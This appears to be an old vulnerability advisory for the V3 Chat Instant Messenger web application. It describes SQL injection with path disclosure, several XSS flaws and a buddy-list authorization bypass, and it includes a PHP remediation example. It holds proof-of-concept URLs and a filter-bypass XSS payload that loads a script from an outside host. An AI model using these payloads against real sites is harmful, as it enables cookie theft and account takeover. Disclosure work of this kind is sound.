V3 Chat Instant Messenger
Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
Mail Vulnerabilities:
Full path disclosure via SQL injection on id when reading mail:
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17
XSS vuln with cookie disclosure:
We can bypass V3 Chat's filters by using malformed img tags around our script tags. PoC:
Replying to mail XSS vulns:
Members online XSS vulns with cookie disclosure:
Same as above, on online.php:
SCRIPT>">
Adding members via online.php MySQL error & full path disclosure:
http://www.example.com/messenger/online.php?action=update&membername='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1
Search.php XSS vuln:
Adding a member from search.php XSS vuln:
Same as above, this time on profile.php:
Same as above, now on profileview.php:
XSS vuln with cookie disclosure when editing profile:
To bypass V3 Chat's filters we can use this XSS example. Credits to RSnake. Script tags are wrapped around a document.write function that writes part of our second script tag.
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>
Mycontacts.php XSS vulns with user bypass.
It seems that after you log in as a user you're able to put any username in membername= and it will take you to that user's buddy list. From there you can add, remove, chat with, etc. people on their buddy list.
PoC:
http://example.com/messenger/mycontacts.php?membername=putausername
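One way to close the mycontacts.php issues described above, as an added example that is not V3 Chat's code: the buddy-list owner is taken from the server-side session instead of the membername parameter, and every echoed value is HTML-encoded. The session key 'member', the function names and the sample requests are assumptions made for illustration.

```php
<?php
// Added example, not V3 Chat source. The session key 'member' and both
// function names are hypothetical.

// Encode a value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Decide whose buddy list may be served. The identity comes from the
// server-side session; a membername in the query string is accepted only
// when it names the logged-in user.
function contacts_owner(array $session, array $query): ?string
{
    $loggedIn = $session['member'] ?? null;
    if (!is_string($loggedIn) || $loggedIn === '') {
        return null;                      // not authenticated
    }
    $requested = $query['membername'] ?? $loggedIn;
    if (!is_string($requested) || $requested !== $loggedIn) {
        return null;                      // someone else's list: refuse
    }
    return $loggedIn;
}

// Constructed requests standing in for $_SESSION and $_GET.
$session = ['member' => 'alice'];
$cases = [
    'own list'        => ['membername' => 'alice'],
    'other member'    => ['membername' => 'putausername'],
    'markup in name'  => ['membername' => '<SCRIPT>document.write("<SCRI");</SCRIPT>PT'],
    'array parameter' => ['membername' => ['alice']],
];

foreach ($cases as $label => $query) {
    $owner = contacts_owner($session, $query);
    $raw   = $query['membername'];
    $shown = is_string($raw) ? $raw : '(non-string)';
    // Every value that reaches the page goes through h(), so reflected
    // markup arrives as &lt;SCRIPT&gt;... text rather than as a tag.
    printf("%-16s requested=%s -> %s\n", $label, h($shown),
        $owner === null ? '403 refused' : 'serve list for ' . h($owner));
}
```

The same two rules (identity from the session, encoding at output) apply to the other pages listed under "Affected files" that reflect request parameters.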
Expire.php XSS vuln:
Screenshots:
http://www.youfucktard.com/xsp/v3chat1.jpg
http://www.youfucktard.com/xsp/v3chat2.jpg
http://www.youfucktard.com/xsp/v3chat3.jpg
http://www.youfucktard.com/xsp/v3chat4.jpg
http://www.youfucktard.com/xsp/v3chat5.jpg
http://www.youfucktard.com/xsp/v3chat6.jpg
http://www.youfucktard.com/xsp/v3chat7.jpg
http://www.youfucktard.com/xsp/v3chat8.jpg
http://www.youfucktard.com/xsp/v3chat9.jpg
http://www.youfucktard.com/xsp/v3chat10.jpg